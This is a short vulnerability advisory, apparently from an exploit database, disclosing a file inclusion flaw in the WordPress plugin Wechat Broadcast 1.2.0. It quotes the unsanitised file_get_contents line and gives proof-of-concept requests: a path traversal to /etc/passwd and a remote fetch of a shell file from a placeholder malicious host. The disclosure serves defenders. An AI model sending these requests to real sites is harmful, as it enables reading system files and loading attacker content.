WordPress Wechat Broadcast 1.2.0 Local File Inclusion

2018.09.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/wechat-broadcast/ # CVE: N/A # Description # This bug was found in the file: /wechat-broadcast/wechat/Image.php # echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : ''); # The parameter "url" it is not sanitized allowing include local or remote files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol # to interact with the application. # PoC # The following URL have been confirmed that is vulnerable to local and remote file inclusion. GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd # Remote File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top